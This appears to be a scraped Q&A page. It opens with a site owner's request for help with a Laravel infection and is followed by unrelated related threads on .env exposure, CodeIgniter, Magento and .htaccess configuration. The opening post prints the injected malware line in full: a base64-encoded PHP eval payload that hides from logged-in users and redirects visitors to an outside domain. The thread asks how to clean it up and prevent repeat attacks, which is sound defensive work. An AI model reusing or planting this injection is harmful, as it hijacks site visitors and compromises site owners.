All my Laravel websites have been infected by a malicious code named aeR4Choc.
It seems to (only???) infect the public/index.php file by redirecting to malicious sites.
here's the line that can be decoded:
/*aeR4Choc_start*/#eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgICAgfQogICAgfQp9'));/*aeR4Choc_end*/
My questions:
How to get rid of it ? Just by deleting it?
How did it happened and how can I prevent further attacks?
Thanks!
I would start by restoring the original index.php file from the Laravel install. You can just delete the code, but they may have added more (like a cors header). Might want to load up a backup from before the hack and run a diff to see what other files were altered.
Check the file permissions on index.php - change it to 644 and change the owner to root and group to www (if you have that group).
If you have debug=true in your .env file you may be open to attack
https://www.ambionics.io/blog/laravel-debug-rce
Related
Currently I've put my laravel site online (just for testing). But when I go to for example www.mysite.nl/.env it shows my password etc. for my database. How can I prevent this?
It should be mentioned that use of .env files is intended to be for development only, not production.
Once you're ready to take the site live, the values that you put in the .env file should be moved to the server environment variables.
This should be more secure for two reasons:
The problem you've discovered, that the .env file is accessible, will no longer apply, since there will be no more .env file. Plus, this won't require any server configuration changes (.htaccess files or similar) to restrict access to the .env file.
Server environment variables will not be accessible to anyone without shell access to the server.
Also keep in mind that .env file should not be reachable by users. Only the public/ folder content must be reachable. Set your server configuration to do it ( not always possible though ).
Otherwise, for your production environment you can simply ommit the .env file and define all the settings directly in app/config/
Some hosters also provide their servers with Forge.
Remember to always put your .env file into the .gitignore file if you are using it.
Have a nice day
Removing .env alone doesn't guarantee that your code is safe. As the only reason why this happen is that you ignore the default recommended structure which is to only give access for the web server to public directory.
Now, let say you removed the .env file. Are you sure that:
Nobody can access storage/logs/laravel.log (or daily rotating log file).
Are you sure you're cache and session data is safe, if you're using file based driver.
Are you sure nobody can peek at your compiled blade view under storage/framework/views.
Don't ever skip and compromise security to solve your webhosting limitation.
To hide .env on apache server add this below code in top of your htaccess file. this will also hide directory list view and will hide gitignore webpack config and more. hope that helps
# Disable Directory listing
Options -Indexes
# block files which needs to be hidden, specify .example extension of the file
<Files ~ "\.(env|json|config.js|md|gitignore|gitattributes|lock)$">
Order allow,deny
Deny from all
</Files>
# in here specify full file name sperator '|'
<Files ~ "(artisan)$">
Order allow,deny
Deny from all
</Files>
Be careful, the accepted answer skips over an important detail. Even if the .env file is removed, the directory that it resides in should not be accessible in the first place.
Instead of attempting to deny access to a list of files or folders as some people suggest, the web server's Document Root should be set to the /public folder in a Laravel application. All requests will then be mapped safely starting from /public, which means that the source files of your application are not accessible from the web unless you explicitly give access to them.
Hi i'm a bit new at uploading a website to a webserver and i've encountered a problem.
my site is using codeigniter and my host is MochaHost.
First of all I already successfully uploaded the site i made it run twice,
but on my last upload of updated files the power went out and the upload stopped half-way through. And when the power was back I reuploaded the updated files.
Now, the problem is that when ever i try to open my site it only displays a blank page. I've tried to view specific page but it still displays a blank page. Here's the site: http://www.sph-mis.com/ .. displaying only blank pages
I read somewhere that the problem might be the directory in were i put the files, and i put it on the public_html directory
http://imgur.com/EDM6Nka
The 1st and 2nd try i did worked with the same directory but now its doesnt work.
now it just displayig blank sapce;
Can anyone help me with this?
FIXED
check the reply i made below
So really the question is how to I debug a blank page in CodeIgniter. I don't know if there are some php errors waiting to be found behind that white screen of death but its your first step to figuring it out. So here goes some ways to get some errors you can actually work with.
in your .htaccess file where index.php is located put this into it: (if none exists create it)
# display php errors
php_flag display_startup_errors on
php_flag display_errors on
php_flag html_errors on
if you get a 500 error your host may be using suPHP and you cant do it this way.
another thing to do is try this
for ci older then 2.x modify the error_reporting function in index.php to use E_ALL
error_reporting(E_ALL);
for ci newer then 2.x instead set ENVIRONMENT in index.php as:
define('ENVIRONMENT', 'development');
this sets the error_reporting to E_ALL.
You can also set in application/config/config.php
$config['log_threshold'] = 4;//or 1 for error messages only
then check for a log file in the application/logs/ directory (make sure its writable)
Also make sure your db settings are correct. CI may suppress a database connection error.
Lets see if that gets you any further.
I already fixed it, what i did was got a clean copy of codeigniter and replace the application folder and added my assets folder to it and then uploaded it.. and it worked. Something must have been wrong within my old system folder.
After updating URL Base in Magento admin form http//:www.web.com to https//:www.web.com it through error :
this webpage has a redirect loop
Tell me please why i get this error and how remove this?
If you edit the secure/unsecure base url for you Magento site you may find yourself, in a never ending loop. Perform the following steps to solve it:
Log in to your database using phpMyadmin or similar.
Find the table labelled core_config_data
Edit the rows entitled web/unsecure/base_url and
web/secure/base_url
Edit the row web/url/redirect_to_base to 0 instead of 1
Clear contents of both var/cache and
var/sessions folders.
[EDIT]
Your URL should be like http://www.web.com/ with trailing slash.
Site relocation issues:
Forgetting the trailing slash on the baseURLs
changing the rewritebase in .htaccess
check file/folder permissions and change so server can write to the
directory tree especially var/ and media/
app/etc/local.xml changes so Magento can access the new database
After fixing these things, clear Cache.
Please make sure you dont have any unwanted .xml files in /app/etc/ folder.
values in local.xml files will be overwritten by other files.
I solved this problem by setting web/cookie/cookie_lifetime in core_config_data table to 3600.
Had this problem on Magento2 after switching to https.
Check web/secure/use_in_adminhtml and web/secure/use_in_frontend settings in core_config_data, they both should be set to 1. It solved the issue for me.
delete cookies for domain, it wored for me in case of infinite 302 loops
Remove var folder from Magento root.
It has solved my problem
Clearing all cache solved my problem.
I have setup a development server for an issue(see No Input File Specified - Joomla), all is working correct now on the development server apart from no images on the site or inside the administration menu are loading.
When I try to look at them individually they are 403 forbidden.
http://37.26.108.168/~arbersho/
All directories are 755, all files are 644 and the owner is the correct one.
Is this because of the temporary URL and will this be fixed by pointing the domain over?
Thanks again
This was a htaccess issue which is fixed.
I recently migrated my magento website to a different server, and here's the process I used:
made a dump of the database.
copied all the system files from the FTP to my hard drive.
emptied the VAR folder
emptied the media cache folders
replaced the strings in the SQL dump from http://www.oldsite.com to http://www.newsite.com
restored the database on the new server
modified the local.xml file to suit the new database host, login and password.
uploaded the system files to the new server
Everything seems to work fine, except for the fact that the product images are not being displayed on the frontend for some reason.
For example, here's a path from an image that was supposed to be showing, which I got through firebug:
http://www.newsite.com/media/catalog/product/cache/1/small_image/113x113/9df78eab33525d08d6e5fb8d27136e95/1/_/1_9.jpg
When I search for the path of the image the site is supposed to show in the FTP, the file is actually there. I can download it and display it on my computer. I don't know why this is happening. It doesn't make any sense to me.
This /media/catalog/product/cache/ was generated by the system, because I erased it myself before uploading the site, so I guess it isn't a cache related issue.
Well, I described the issue the best I could. I hope you can help me out.
EDIT:
Hmm, it turns out the problem was the .htaccess file inside the media folder! Removed the file -> Problem solved!
Just in case anyone else has the same problem, removing the .htaccess in the media folder did the trick. I don't know if that's the best possible solution though! Thanks!
Change Options All -Indexes to Options -Indexes in the above mentioned .htaccess file.
copied all the system files from the FTP to my hard drive.
This one makes me a bit suspecting. Magento has case-sensitive folders in the media folder. There would be, for instance, an 'a' folder and an 'A' folder in the same location.
If you downloaded your files unarchived (file by file) via FTP to a Windows machine, this would cause a conflict and would omit up to half your images.
Ok, since everything checked out with the base URL, my next suggestion is a migration path option if you have cPanel on the old server, and since most do, this should help:
Create a full backup of the account using cPanel. This will create a tar.gz of the entire account.
Download the tarred backup to your computer and unzip.
Find home_dir.tar - this is what contains your HTML root information. You can either upload this directly to the server and untar there using SSH, or do it on your local computer and upload.
Find the SQL folder in the untarred backup. There should be a dump of your database there. Use source to put that information into a new database.
On the server, delete use_cache.ser and change config information for the new database.
Your .htaccess should have come over in the home_dir.tar, but make sure that it's correct per our other question
Once that's done, you should be fully functional, unless you need to make changes in the database base_url for the new server.
Images not showing in Magento 1.7 to 1.9 upgrade:
My solution:
in /media/.htaccess
fixed options syntax:
# Options ExecCGI Includes IncludesNOEXEC SymLinksIfOwnerMatch -Indexes
Options +ExecCGI +Includes +IncludesNOEXEC +SymLinksIfOwnerMatch -Indexes
removed these. Maybe conflict with .htaccess in site root directory??
# For security reasons, Option followsymlinks cannot be overridden.
# Options +FollowSymLinks
# Options +SymLinksIfOwnerMatch
# RewriteEngie on
also changed ownership of .htaccess to apache
chown apache:apache /var/www/mystore/media/.htaccess
Would like opinion of why these may be causing 500 errors.
php bin/magento catalog:images:resize
This helped me, but it take's a lot of time to complete
for magento 2.4.5
in pub//media/.htaccess
change „FollowSymLinks“ to „SymLinksIfOwnerMatch“. example:
############################################
enable rewrites
Options +SymLinksIfOwnerMatch
RewriteEngine on
## you can put here your pub/media folder path relative to web root
#RewriteBase /magento/pub/media/
############################################